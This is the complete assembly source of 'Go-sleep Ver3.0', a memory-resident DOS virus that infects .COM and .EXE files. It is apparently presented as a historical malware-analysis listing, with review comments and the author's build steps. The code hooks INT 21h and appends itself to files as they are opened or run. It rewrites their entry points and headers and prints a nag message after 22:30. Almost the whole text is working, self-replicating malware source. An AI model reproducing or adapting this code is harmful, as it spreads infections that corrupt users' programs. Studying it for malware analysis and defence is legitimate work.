; Go-sleep Ver3.0 -- a DOS .COM/.EXE file infector that the author describes as
; a modified/upgraded version of the "V0" virus, written to spread under DOS.
; Reviewed here as a historical malware-analysis listing: the comments are
; analysis notes, the text was machine-translated, and many comment separators
; (';') were lost in extraction and are restored below.
; This part of the program uses 32-bit (386) instructions.
; Build steps as given by the author:
;   Tasm32 Dv1
;   Tlink Dv1
;   Debug Dv1.exe
;   -N dv1.com
;   -W
;   -q
; which finally produces Dv1.com, the virus program.
Off Equ Offset                          ; shorthand used throughout: off X == offset X

DOSMCB struc                            ; DOS memory control block (first 5 of its 16 bytes)
Flag db ?                               ; 'M' = another block follows, 'Z' = last block in the chain
Owner DW ?                              ; PSP segment of the owner; 8 = DOS itself, 0 = free block
Sizes DW ?                              ; size of the block in paragraphs (1 = 10h bytes)
DOSMCB Ends

Exeheader Struc                         ; DOS MZ executable header (first 1Ch bytes)
Flags DW 'ZM'                           ; "MZ" signature read as a little-endian word
Modsize DW ?                            ; bytes used in the last 512-byte page
Pages DW ?                              ; file size in 512-byte pages (rounded up)
Reloc DW ?                              ; number of relocation entries
Mesize DW ?                             ; header size in paragraphs
Minmem DW ?                             ; minimum memory (paragraphs) the program needs beyond the image
Maxmem DW ?                             ; maximum memory (paragraphs) the program asks for
STARTSS DW ?                            ; initial SS, relative to the load segment
                                        ; (the original listing had the SS/SP comments swapped;
                                        ;  @@IsExeFile below stores the new code segment here)
STARTSP DW ?                            ; initial SP
CheckSum DW ?                           ; header checksum; @@IsExeFile reuses it as the 'VV' infection marker
StartIP DW ?                            ; initial IP
Startcs DW ?                            ; initial CS, relative to the load segment
Relocoff DW ?                           ; file offset of the relocation table
Exeheader Ends

Virussize=off @@End-off @@Start         ; number of bytes written into an infected file
Virusmemsize=off @@MemEnd-off @@Start   ; bytes reserved in memory (adds the Myexeheader scratch buffer)
.386                                    ; 32-bit registers/addressing are used in the EXE return path below
.Model Small
.Code
Org 100h                                ; assembled as a COM image: every fixed offset assumes base 100h,
                                        ; which is why @@Install places the resident copy at seg:100h
@@Start:                                ; entry stub: runs first in every infected host (COM or EXE)
    Pusha                               ; save all general registers for the host
    MOV AX,4D4DH
    int 21h                             ; "are you there?" probe; the resident hook IRETs with AX unchanged,
                                        ; whereas plain DOS (AH=4Dh, get child return code) normally alters AX
    CMP AX,4D4DH
    JZ short @@ExecOldApp               ; already resident: skip installation
    Call @@Install
@@ExecOldApp:
    MOV ah,2ch
    int 21h                             ; DOS get time: CH = hour, CL = minute
    CMP cx,22*100h+30                   ; CX = hour*256+minute, compared against 22:30
    JB Short @@TestFlag                 ; before 22:30 stay silent
    Call @@DisplayMsg                   ; payload: print the "go sleep" message
@@TestFlag:
    CLC                                 ; patched in the file image at infection time:
                                        ; 0F8h (CLC) = COM host, 0F9h (STC) = EXE host
    JC Short @@IsExeApp
@@IsComApp:
    Call @@GetOldComAppCode             ; pushes the address of Oldappcode (position-independent trick)
Oldappcode DW 20CDH                     ; 0CDh,20h = INT 20h (terminate) in the uninfected carrier;
DW 0000h                                ; overwritten at infection time with the host's first 4 bytes
@@GetOldComAppCode:
    Pop si                              ; si = runtime offset of Oldappcode
    MOV di,100h
    Cld
    Lodsd
    stosd                               ; restore the host's original 4 bytes at CS:100h
    Popa                                ; restore all general registers
    Push word ptr 100h                  ; presumably assembles as "push 100h": the COM entry point
    RET                                 ; near return to CS:100h = run the restored host
@@IsExeApp:
    Popa                                ; restore the host's registers (AX is borrowed again below)
    CLI                                 ; no interrupts while SS:SP is inconsistent
    mov sp,es                           ; ES = PSP segment on entry
    Add sp,10h                          ; PSP+10h = load segment of the image
Spadddata DW 0c481h                     ; 81h 0C4h = ADD SP,imm16; the immediate is the next word
                                        ; (the original comment wrongly calls this 0BCh)
OLDAPPSS DW 000h                        ; host's original SS (relative), filled in by @@IsExeFile
    MOV ss,sp                           ; SS = load segment + original SS
MOVEDATATOSP db 0bch                    ; 0BCh = MOV SP,imm16; the immediate is the next word
OLDAPPSP DW 000h                        ; host's original SP, filled in by @@IsExeFile
    STI                                 ; stack is valid again
    Push AX
    mov ax,es
    Add ax,10h                          ; load segment again
Axadddata db 005h                       ; 05h = ADD AX,imm16
Oldappcs DW 000h                        ; host's original CS (relative); AX = absolute host CS
    MOVZX esp,sp                        ; zero the upper half of ESP so the 32-bit [ESP] operand below is safe
    Xchg AX,[ESP]                       ; AX gets the saved value back, the stack slot now holds host CS
                                        ; (16-bit addressing cannot encode [SP] as a memory operand)
Pushworddata db 068h                    ; 68h = PUSH imm16
Oldappip DW 000h                        ; host's original IP
    RETF                                ; pops IP then CS: jump to the host's original CS:IP
@@Install:                              ; go resident: carve memory above the last MCB, copy the body there
                                        ; and hook INT 21h. Preserves DS and ES.
    Push DS
    Push es
    MOV Ax,ds                           ; DS = PSP on entry (DOS sets DS=ES=PSP for COM and EXE hosts)
    Dec ax                              ; the program's own MCB sits in the paragraph just below its PSP
@@ContFindLastMcb:                      ; walk the MCB chain until the 'Z' (last) block
    MOV Ds,ax
    CMP Ds:[flag],'Z'
    JZ Short @@FoundLastMcb
    Add ax,ds:[sizes]
    Inc AX                              ; next MCB = this MCB + 1 (header paragraph) + size
    JMP Short @@ContFindLastMcb
@@FoundLastMcb:
    Sub ds:[sizes],(virusmemsize/10h)+1 ; shrink the last block by the virus footprint, in paragraphs.
                                        ; NOTE(review): nothing checks that the block is free, owned by this
                                        ; program, or large enough; the carved-out region gets no MCB, so
                                        ; DOS never learns about it
    Add ax,ds:[sizes]
    Inc AX                              ; AX = first paragraph above the shrunk block = resident home
    MOV Es,ax
    XOR Di,di
    Push CS
    Pop ds                              ; copy source is the running image
    Call @@GetVirusBase
@@GetVirusBase:
    Pop si                              ; si = runtime offset of @@GetVirusBase
    Sub Si,off @@GetVirusBase-off @@Start ; si = runtime offset of @@Start (valid at any load offset)
    MOV cx,virussize
    Cld
    Rep MOVSB                           ; ES:0 <- virus body (Myexeheader scratch space is not copied)
    Sub ax,10h                          ; the body assumes Org 100h, so address it as (ES-10h):100h
    MOV Ds,ax
@@ContInstall:
    MOV ax,3521h
    int 21h                             ; ES:BX = current INT 21h vector
    MOV ds:oldint21seg,es               ; stored into the resident copy's far-jump operand (see @@JmpOldInt21)
    MOV ds:oldint21off,bx
    Lea dx,@@NewInt21                   ; DS:DX = resident hook
    MOV ax,2521h
    int 21h                             ; install the hook
    Pop es
    Pop ds
    Ret
@@NewInt21:                             ; resident INT 21h filter
    CMP AX,4D4DH
    JNZ Short @@NextHook
    Iret                                ; "are you there?" probe: return with AX still 4D4Dh
@@NextHook:
    CMP AH,4BH                          ; 4Bh = EXEC
    JZ Short @@MyBeCom
    CMP ah,43h                          ; 43h = get/set file attributes
    JZ Short @@MyBeCom
    CMP AH,3DH                          ; 3Dh = open file
    JZ short @@MyBeCom                  ; all three carry DS:DX = ASCIIZ filename
@@JmpOldInt21:                          ; tail-chain to the saved handler on the caller's own INT frame
    CLI                                 ; NOTE(review): appears redundant -- INT already cleared IF and the
                                        ; original handler's IRET restores the caller's flags
    Jmpfar db 0eah                      ; 0EAh = JMP FAR ptr16:16; the operand is patched by @@Install
Oldint21off DW ?
Oldint21seg DW ?
@@CallInt21:                            ; invoke the original DOS handler from inside the hook
    Pushf                               ; build an INT-style frame (flags, CS, IP) ...
    Push CS
    Call @@JmpOldInt21                  ; ... so the handler's IRET returns here
    Ret
@@MyBeCom:                              ; DS:DX -> ASCIIZ path of the file being opened/executed/queried
    Pusha
    Push DS
    MOV si,dx
    XOR Al,al
@@ContFindExtName:                      ; scan to the terminating NUL
    Inc si                              ; NOTE(review): no length bound, the byte at DX itself is never tested,
                                        ; and a path shorter than 4 bytes makes [si-4] read before the buffer
    CMP [Si],al
    JNZ Short @@ContFindExtName
    MOV eax,[si-4]                      ; last 4 characters of the name as a dword
    or eax,20202020h                    ; force ASCII letters to lowercase
    cmp eax,'MOC.'                      ; ".com" as a little-endian dword. NOTE(review): EAX is lowercase after
                                        ; the OR above, so only a lowercase 'moc.' constant can ever match;
                                        ; the uppercase form is probably a transcription artifact (compare
                                        ; the lowercase 'exe.' two lines down)
    JZ Short @@IsComFile
    cmp eax,'exe.'                      ; ".exe"
    JZ Short @@IsExeFile
@@ExitOpt:                              ; common exit: restore registers and let DOS service the call
    Pop ds
    Popa
    JMP Short @@JmpOldInt21
@@IsComFile:                            ; append the body to a .com file and patch its first 4 bytes
    MOV ax,3d02h
    Call @@CallInt21                    ; open read/write via the original handler (3Dh is hooked, so a
                                        ; direct INT 21h would re-enter this filter)
    JC Short @@OptComFalse              ; open failed (e.g. read-only file; attributes are not touched)
    MOV Bx,ax                           ; BX = handle
    Push CS
    Pop ds                              ; DS = resident virus segment
    mov ds:byte ptr[@@TestFlag],0f8h    ; self-modify: @@TestFlag = CLC so the written copy knows it is in a COM
    Lea Dx,oldappcode
    MOV cx,4
    MOV ah,3fh
    int 21h                             ; host's first 4 bytes -> Oldappcode (carried into the written body)
    JC Short @@CloseComFile             ; NOTE(review): AX (bytes actually read) is not checked, unlike the EXE path
    MOV si,dx
    CMP word ptr[si],'ZM'               ; an EXE renamed to .com: leave it alone
    JZ short @@CloseComFile
    CMP byte ptr[si+3],'V'              ; 4th byte 'V' = already infected (see @@JmpVirus)
    JZ short @@CloseComFile
    MOV ax,4202h
    XOR cx,cx
    XOR DX,DX
    int 21h                             ; seek to end: DX:AX = file length
    or DX,DX
    JNZ short @@CloseComFile            ; 64K or more: too big
    MOV Dx,ax
    Add Ax,virussize
    JC Short @@CloseComFile             ; length + body would wrap 16 bits
    CMP ax,0fd00h
    JA short @@CloseComFile             ; presumably keeps image + PSP + stack inside the 64K COM segment
    Sub dx,03                           ; JMP rel16 at offset 0: displacement = target - 3
    MOV ds:jmpoffset,dx
    Lea dx,@@Start
    MOV cx,virussize
    MOV ah,40h
    int 21h                             ; append the body (file pointer is still at end)
    MOV ax,4200h
    XOR cx,cx
    XOR DX,DX
    int 21h                             ; seek to start
    MOV cx,04h
    Lea dx,@@JmpVirus
    MOV ah,40h
    int 21h                             ; overwrite bytes 0-3 with E9 xx xx 'V'
@@CloseComFile:
    MOV Ah,3eh
    int 21h                             ; close; none of the write results were checked, and the file's
                                        ; date/time is not restored
@@OptComFalse:
    JMP Short @@ExitOpt
@@IsExeFile:                            ; append the body to an MZ executable and repoint its header
    MOV ax,3d02h
    Call @@CallInt21                    ; open read/write through the original handler
    JC @@OptExeFalse
    MOV Bx,ax                           ; BX = handle
    Push CS
    Pop ds                              ; DS = resident virus segment
    mov ds:byte ptr[@@TestFlag],0f9h    ; self-modify: @@TestFlag = STC so the written copy knows it is in an EXE
    Lea Dx,myexeheader
    MOV cx,size exeheader
    MOV ah,3fh
    int 21h                             ; read the 1Ch-byte header into the scratch buffer
    JC @@CloseExeFile
    CMP AX,CX
    JB @@CloseExeFile                   ; short read
    MOV si,dx                           ; SI -> myexeheader
    CMP word ptr[si.Flags],'ZM'
    JNZ @@CloseExeFile                  ; not an MZ file despite the .exe name
    cmp [SI.CheckSum],'VV'              ; infection marker
    JZ @@CloseExeFile
    MOV ax,4202h
    XOR cx,cx
    XOR DX,DX
    int 21h                             ; seek to end: DX:AX = file length
    CMP dx,8h
    JA short @@CloseExeFile             ; rejects lengths of 9*64K and up. NOTE(review): this is the only
                                        ; "Windows application" heuristic; NE/PE files are not detected,
                                        ; and Reloc/Relocoff are never examined
    SHL edx,16
    MOV Dx,ax                           ; EDX = file length
    push edx
    SHR edx,4                           ; paragraphs
    Sub Dx,[si.Mesize]                  ; minus header paragraphs = body CS relative to the load segment
    and ax,0fh                          ; body IP = length mod 16
    mov cx,dx                           ; CX = same relative segment, reused for SS
    Xchg [Si.Startcs],dx
    mov ds:[oldappcs],dx                ; header CS <- body; Oldappcs <- host CS
    Xchg [Si.Startss],cx
    mov ds:[oldappss],cx                ; header SS <- body segment; Oldappss <- host SS
    Xchg [Si.Startip],ax
    mov ds:[oldappip],ax                ; header IP <- body; Oldappip <- host IP
    XOR Ax,ax
    Xchg [Si.Startsp],ax                ; header SP <- 0: the stub's first push lands at bodyCS:0FFFEh
    MOV Ds:[oldappsp],ax                ; NOTE(review): Minmem/Maxmem are left unchanged, so that stack slot
                                        ; (and the appended body) may lie outside what DOS allocates to the host
    mov [SI.CheckSum],'VV'              ; set the infection marker
    Pop edx                             ; EDX = original file length
    MOV ecx,virussize
    Add edx,ecx                         ; new length
    MOV ax,dx
    and AX,1FFH
    mov [SI.Modsize],ax                 ; bytes in the last page
    Add EDX,1FFH
    SHR edx,9
    mov [SI.Pages],dx                   ; pages, rounded up. Both are derived from the physical file size,
                                        ; so any data past the original image (overlays) presumably becomes
                                        ; part of the loaded image
    Lea dx,@@Start                      ; CX = virussize (low half of ECX)
    MOV ah,40h
    int 21h                             ; append the body at end of file
    MOV ax,4200h
    XOR cx,cx
    XOR DX,DX
    int 21h                             ; seek to start
    MOV cx,size exeheader
    Lea Dx,myexeheader
    MOV ah,40h
    int 21h                             ; write back the modified header (write results unchecked)
@@CloseExeFile:
    MOV Ah,3eh
    int 21h                             ; close
@@OptExeFalse:
    JMP @@ExitOpt
@@JmpVirus:                             ; the 4-byte patch written over a COM host's first bytes
Jumpnear DB 0e9h                        ; 0E9h = JMP rel16
Jmpoffset DW ?                          ; filled in by @@IsComFile: file length - 3
Virusflag db 'V'                        ; byte 3: infection marker tested by @@IsComFile
@@DisplayMsg:                           ; payload: print the nag string with DOS AH=09h
    Pop DX                              ; DX = return address; the only caller is @@ExecOldApp, so this is
    Push DX                             ; the runtime offset of @@TestFlag
    Add Dx,off @@Message-off @@TestFlag ; relocate to @@Message's runtime offset
    Push DS
    Push CS
    Pop ds                              ; DS:DX = message
    MOV ah,09h
    int 21h                             ; print up to the '$'
    Pop ds
    Ret
@@Message:
    DB 0ah,0dh,07h                      ; LF, CR, BEL
    DB ' Night is deep,you must go sleep! '
    DB 0AH,0DH, ' $ '                   ; the '$' terminates the AH=09h string
    DB ' Go-sleep Ver3.0 by WHG 2001.5.2 ' ; author tag; sits after the '$' so it is never printed
@@End:                                  ; end of the bytes copied into files (Virussize)
Myexeheader db size Exeheader dup (?)   ; header scratch buffer; resident only, counted in Virusmemsize
@@MemEnd:
End @@Start